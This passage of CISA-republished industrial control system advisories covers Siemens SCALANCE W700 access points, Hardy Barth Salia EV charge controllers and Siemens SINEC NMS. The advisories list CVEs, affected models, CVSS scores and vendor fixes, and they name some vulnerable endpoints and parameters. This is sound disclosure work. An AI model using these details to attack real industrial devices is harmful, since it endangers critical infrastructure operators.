W778-1 M12 (6GK5778-1GY00-0AA0), SCALANCE W778-1 M12 (6GK5778-1GY00-0AB0), SCALANCE W778-1 M12 EEC (6GK5778-1GY00-0TA0), SCALANCE W778-1 M12 EEC (USA) (6GK5778-1GY00-0TB0), SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AA0), SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AB0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AA0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AB0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AC0), SCALANCE W786-2 SFP (6GK5786-2FE00-0AA0), SCALANCE W786-2 SFP (6GK5786-2FE00-0AB0), SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AA0), SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AB0), SCALANCE W788-1 M12 (6GK5788-1GD00-0AA0), SCALANCE W788-1 M12 (6GK5788-1GD00-0AB0), SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AA0), SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AB0), SCALANCE W788-2 M12 (6GK5788-2GD00-0AA0), SCALANCE W788-2 M12 (6GK5788-2GD00-0AB0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TA0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TB0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TC0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AA0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AB0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AC0) Product Status: known_affected Remediations Vendor fix Update to V6.6.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109996102/ Relevant CWE: CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop') Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2022-31765 Affected devices do not properly authorize the change password function of the web interface. This could allow low privileged users to escalate their privileges. View CVE Details Affected Products Siemens SCALANCE Vendor: Siemens Product Version: SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AA0), SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AB0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AA0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AB0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AC0), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA0), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA6), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AB0), SCALANCE W734-1 RJ45 (USA) (6GK5734-1FX00-0AB6), SCALANCE W738-1 M12 (6GK5738-1GY00-0AA0), SCALANCE W738-1 M12 (6GK5738-1GY00-0AB0), SCALANCE W748-1 M12 (6GK5748-1GD00-0AA0), SCALANCE W748-1 M12 (6GK5748-1GD00-0AB0), SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AA0), SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AB0), SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AA0), SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AB0), SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TA0), SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TB0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA6), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AB0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AC0), SCALANCE W774-1 RJ45 (USA) (6GK5774-1FX00-0AB6), SCALANCE W778-1 M12 (6GK5778-1GY00-0AA0), SCALANCE W778-1 M12 (6GK5778-1GY00-0AB0), SCALANCE W778-1 M12 EEC (6GK5778-1GY00-0TA0), SCALANCE W778-1 M12 EEC (USA) (6GK5778-1GY00-0TB0), SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AA0), SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AB0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AA0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AB0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AC0), SCALANCE W786-2 SFP (6GK5786-2FE00-0AA0), SCALANCE W786-2 SFP (6GK5786-2FE00-0AB0), SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AA0), SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AB0), SCALANCE W788-1 M12 (6GK5788-1GD00-0AA0), SCALANCE W788-1 M12 (6GK5788-1GD00-0AB0), SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AA0), SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AB0), SCALANCE W788-2 M12 (6GK5788-2GD00-0AA0), SCALANCE W788-2 M12 (6GK5788-2GD00-0AB0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TA0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TB0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TC0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AA0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AB0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AC0) Product Status: known_affected Remediations Vendor fix Update to V6.6.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109996102/ Relevant CWE: CWE-862 Missing Authorization Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C CVE-2022-36323 Affected devices do not properly sanitize an input field. This could allow an authenticated remote attacker with administrative privileges to inject code or spawn a system root shell. View CVE Details Affected Products Siemens SCALANCE Vendor: Siemens Product Version: SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AA0), SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AB0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AA0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AB0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AC0), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA0), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA6), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AB0), SCALANCE W734-1 RJ45 (USA) (6GK5734-1FX00-0AB6), SCALANCE W738-1 M12 (6GK5738-1GY00-0AA0), SCALANCE W738-1 M12 (6GK5738-1GY00-0AB0), SCALANCE W748-1 M12 (6GK5748-1GD00-0AA0), SCALANCE W748-1 M12 (6GK5748-1GD00-0AB0), SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AA0), SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AB0), SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AA0), SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AB0), SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TA0), SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TB0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA6), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AB0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AC0), SCALANCE W774-1 RJ45 (USA) (6GK5774-1FX00-0AB6), SCALANCE W778-1 M12 (6GK5778-1GY00-0AA0), SCALANCE W778-1 M12 (6GK5778-1GY00-0AB0), SCALANCE W778-1 M12 EEC (6GK5778-1GY00-0TA0), SCALANCE W778-1 M12 EEC (USA) (6GK5778-1GY00-0TB0), SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AA0), SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AB0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AA0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AB0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AC0), SCALANCE W786-2 SFP (6GK5786-2FE00-0AA0), SCALANCE W786-2 SFP (6GK5786-2FE00-0AB0), SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AA0), SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AB0), SCALANCE W788-1 M12 (6GK5788-1GD00-0AA0), SCALANCE W788-1 M12 (6GK5788-1GD00-0AB0), SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AA0), SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AB0), SCALANCE W788-2 M12 (6GK5788-2GD00-0AA0), SCALANCE W788-2 M12 (6GK5788-2GD00-0AB0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TA0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TB0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TC0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AA0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AB0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AC0) Product Status: known_affected Remediations Vendor fix Update to V6.6.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109996102/ Relevant CWE: CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C CVE-2022-36324 Affected devices do not properly handle the renegotiation of SSL/TLS parameters. This could allow an unauthenticated remote attacker to bypass the TCP brute force prevention and lead to a denial of service condition for the duration of the attack. View CVE Details Affected Products Siemens SCALANCE Vendor: Siemens Product Version: SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AA0), SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AB0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AA0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AB0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AC0), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA0), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA6), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AB0), SCALANCE W734-1 RJ45 (USA) (6GK5734-1FX00-0AB6), SCALANCE W738-1 M12 (6GK5738-1GY00-0AA0), SCALANCE W738-1 M12 (6GK5738-1GY00-0AB0), SCALANCE W748-1 M12 (6GK5748-1GD00-0AA0), SCALANCE W748-1 M12 (6GK5748-1GD00-0AB0), SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AA0), SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AB0), SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AA0), SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AB0), SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TA0), SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TB0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA6), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AB0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AC0), SCALANCE W774-1 RJ45 (USA) (6GK5774-1FX00-0AB6), SCALANCE W778-1 M12 (6GK5778-1GY00-0AA0), SCALANCE W778-1 M12 (6GK5778-1GY00-0AB0), SCALANCE W778-1 M12 EEC (6GK5778-1GY00-0TA0), SCALANCE W778-1 M12 EEC (USA) (6GK5778-1GY00-0TB0), SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AA0), SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AB0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AA0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AB0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AC0), SCALANCE W786-2 SFP (6GK5786-2FE00-0AA0), SCALANCE W786-2 SFP (6GK5786-2FE00-0AB0), SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AA0), SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AB0), SCALANCE W788-1 M12 (6GK5788-1GD00-0AA0), SCALANCE W788-1 M12 (6GK5788-1GD00-0AB0), SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AA0), SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AB0), SCALANCE W788-2 M12 (6GK5788-2GD00-0AA0), SCALANCE W788-2 M12 (6GK5788-2GD00-0AB0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TA0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TB0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TC0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AA0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AB0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AC0) Product Status: known_affected Remediations Vendor fix Update to V6.6.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109996102/ Relevant CWE: CWE-770 Allocation of Resources Without Limits or Throttling Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C CVE-2022-36325 Affected devices do not properly sanitize data introduced by an user when rendering the web interface. This could allow an authenticated remote attacker with administrative privileges to inject code and lead to a DOM-based XSS. View CVE Details Affected Products Siemens SCALANCE Vendor: Siemens Product Version: SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AA0), SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AB0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AA0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AB0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AC0), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA0), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA6), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AB0), SCALANCE W734-1 RJ45 (USA) (6GK5734-1FX00-0AB6), SCALANCE W738-1 M12 (6GK5738-1GY00-0AA0), SCALANCE W738-1 M12 (6GK5738-1GY00-0AB0), SCALANCE W748-1 M12 (6GK5748-1GD00-0AA0), SCALANCE W748-1 M12 (6GK5748-1GD00-0AB0), SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AA0), SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AB0), SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AA0), SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AB0), SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TA0), SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TB0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA6), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AB0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AC0), SCALANCE W774-1 RJ45 (USA) (6GK5774-1FX00-0AB6), SCALANCE W778-1 M12 (6GK5778-1GY00-0AA0), SCALANCE W778-1 M12 (6GK5778-1GY00-0AB0), SCALANCE W778-1 M12 EEC (6GK5778-1GY00-0TA0), SCALANCE W778-1 M12 EEC (USA) (6GK5778-1GY00-0TB0), SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AA0), SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AB0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AA0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AB0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AC0), SCALANCE W786-2 SFP (6GK5786-2FE00-0AA0), SCALANCE W786-2 SFP (6GK5786-2FE00-0AB0), SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AA0), SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AB0), SCALANCE W788-1 M12 (6GK5788-1GD00-0AA0), SCALANCE W788-1 M12 (6GK5788-1GD00-0AB0), SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AA0), SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AB0), SCALANCE W788-2 M12 (6GK5788-2GD00-0AA0), SCALANCE W788-2 M12 (6GK5788-2GD00-0AB0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TA0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TB0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TC0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AA0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AB0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AC0) Product Status: known_affected Remediations Vendor fix Update to V6.6.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109996102/ Relevant CWE: CWE-80 Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.8 MEDIUM CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C CVE-2023-44373 Affected devices do not properly sanitize an input field. This could allow an authenticated remote attacker with administrative privileges to inject code or spawn a system root shell. Follow-up of CVE-2022-36323. View CVE Details Affected Products Siemens SCALANCE Vendor: Siemens Product Version: SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AA0), SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AB0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AA0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AB0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AC0), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA0), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA6), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AB0), SCALANCE W734-1 RJ45 (USA) (6GK5734-1FX00-0AB6), SCALANCE W738-1 M12 (6GK5738-1GY00-0AA0), SCALANCE W738-1 M12 (6GK5738-1GY00-0AB0), SCALANCE W748-1 M12 (6GK5748-1GD00-0AA0), SCALANCE W748-1 M12 (6GK5748-1GD00-0AB0), SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AA0), SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AB0), SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AA0), SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AB0), SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TA0), SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TB0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA6), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AB0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AC0), SCALANCE W774-1 RJ45 (USA) (6GK5774-1FX00-0AB6), SCALANCE W778-1 M12 (6GK5778-1GY00-0AA0), SCALANCE W778-1 M12 (6GK5778-1GY00-0AB0), SCALANCE W778-1 M12 EEC (6GK5778-1GY00-0TA0), SCALANCE W778-1 M12 EEC (USA) (6GK5778-1GY00-0TB0), SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AA0), SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AB0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AA0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AB0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AC0), SCALANCE W786-2 SFP (6GK5786-2FE00-0AA0), SCALANCE W786-2 SFP (6GK5786-2FE00-0AB0), SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AA0), SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AB0), SCALANCE W788-1 M12 (6GK5788-1GD00-0AA0), SCALANCE W788-1 M12 (6GK5788-1GD00-0AB0), SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AA0), SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AB0), SCALANCE W788-2 M12 (6GK5788-2GD00-0AA0), SCALANCE W788-2 M12 (6GK5788-2GD00-0AB0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TA0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TB0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TC0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AA0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AB0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AC0) Product Status: known_affected Remediations Vendor fix Update to V6.6.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109996102/ Relevant CWE: CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C Acknowledgments Siemens ProductCERT reported these vulnerabilities to CISA. General Recommendations As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity Additional Resources For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories Terms of Use The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of this vulnerability. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of Siemens ProductCERT SSA-019200 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-04-14 Date Revision Summary 2026-04-14 1 Publication Date 2026-04-21 2 Initial CISA Republication of Siemens ProductCERT SSA-019200 advisory Legal Notice and Terms of Use

View CSAF Summary Successful exploitation of these vulnerabilities could crash the device being accessed; a buffer overflow condition may allow remote code execution. The following versions of Hardy Barth Salia EV Charge Controller are affected: Salia Board Firmware <=2.3.81 (CVE-2025-5873, CVE-2025-10371) CVSS Vendor Equipment Vulnerabilities v3 7.3 Hardy Barth Hardy Barth Salia EV Charge Controller Unrestricted Upload of File with Dangerous Type Background Critical Infrastructure Sectors: Energy, Transportation Systems Countries/Areas Deployed: Worldwide Company Headquarters Location: Germany Vulnerabilities Expand All + CVE-2025-5873 A vulnerability was found in eCharge Hardy Barth Salia PLCC 2.3.81. It has been declared as critical. This vulnerability affects unknown code of the file /firmware.php of the component Web UI. The manipulation of the argument media leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. View CVE Details Affected Products Hardy Barth Salia EV Charge Controller Vendor: Hardy Barth Product Version: Hardy Barth Salia Board Firmware: <=2.3.81 Product Status: known_affected Remediations Mitigation Hardy Barth did not respond to CISA's request for coordination. Mitigation Contact Hardy Barth using their contact page here: https://www.hardy-barth.de/de/kontakt for more information. https://www.hardy-barth.de/de/kontakt Mitigation Alternatively, Hardy Barth can also be contacted through their eCharge brand here: https://www.echarge.de/en/contact_company https://www.echarge.de/en/contact_company Relevant CWE: CWE-434 Unrestricted Upload of File with Dangerous Type Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L CVE-2025-10371 A security flaw has been discovered in eCharge Hardy Barth Salia PLCC 2.3.81. This issue affects some unknown processing of the file /api.php. The manipulation of the argument setrfidlist results in unrestricted upload. The attack may be performed from remote. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way. View CVE Details Affected Products Hardy Barth Salia EV Charge Controller Vendor: Hardy Barth Product Version: Hardy Barth Salia Board Firmware: <=2.3.81 Product Status: known_affected Remediations Mitigation Hardy Barth did not respond to CISA's request for coordination. Mitigation Contact Hardy Barth using their contact page here: https://www.hardy-barth.de/de/kontakt for more information. https://www.hardy-barth.de/de/kontakt Mitigation Alternatively, Hardy Barth can also be contacted through their eCharge brand here: https://www.echarge.de/en/contact_company https://www.echarge.de/en/contact_company Relevant CWE: CWE-434 Unrestricted Upload of File with Dangerous Type Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.3 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L Acknowledgments CISA discovered a public Proof of Concept (PoC) as authored by YZS17 and reported it to Hardy Barth Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the Internet. Locate control system networks and remote devices behind firewalls and isolating them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time. Revision History Initial Release Date: 2026-04-21 Date Revision Summary 2026-04-21 1 Initial Publication Legal Notice and Terms of Use

View CSAF Summary Siemens SINEC NMS when used with User Management Component (UMC) contains an authentication bypass vulnerability due to insufficient validation of user identity. This could allow an unauthenticated remote attacker to bypass authentication and gain unauthorized access to the application. Siemens has released a new version for SINEC NMS and recommends to update to the latest version. The following versions of Siemens SINEC NMS are affected: SINEC NMS CVSS Vendor Equipment Vulnerabilities v3 7.3 Siemens Siemens SINEC NMS Improper Verification of Cryptographic Signature Background Critical Infrastructure Sectors: Critical Manufacturing Countries/Areas Deployed: Worldwide Company Headquarters Location: Germany Vulnerabilities Expand All + CVE-2026-24032 The affected application contains an authentication weakness due to insufficient validation of user identity in the UMC component. This could allow an unauthenticated remote attacker to bypass authentication and gain unauthorized access to the application. (ZDI-CAN-27564) View CVE Details Affected Products Siemens SINEC NMS Vendor: Siemens Product Version: SINEC NMS Product Status: known_affected Remediations Vendor fix Update to V4.0 SP3 or later version https://support.industry.siemens.com/cs/ww/en/view/110000760/ Relevant CWE: CWE-347 Improper Verification of Cryptographic Signature Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.3 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L Acknowledgments Siemens ProductCERT reported this vulnerability to CISA. General Recommendations As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity Additional Resources For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories Terms of Use The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems 